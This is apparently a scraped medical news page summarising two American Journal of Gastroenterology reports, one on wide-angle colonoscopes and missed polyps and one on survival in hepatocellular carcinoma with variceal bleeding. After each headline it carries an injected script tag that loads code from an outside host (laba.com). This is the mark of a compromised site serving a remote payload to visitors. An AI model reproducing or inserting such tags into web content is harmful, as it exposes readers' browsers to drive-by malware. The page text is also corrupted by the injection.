Small polyps are routinely missed during colonoscopy<script src=http://laba.com/muuu.s></script> The use of the wide-angle colonoscope was associated with a reduction in insertion time to the cecum, as well as examination time during withdrawal, reports the latest issue of The American Journal of Gastroenterology, however, no evidence was found that the accuracy of the two colonoscopes differs.

Outcome of hepatocellular carcinoma<script src=http://laba.com/muuu.s></script> A report in November's American Journal of Gastroenterology states that HCC patients who present with variceal bleeding have a significantly worse survival outcome than the general HCC patients, but transarterial chemoembolization may offer some survival benefit.
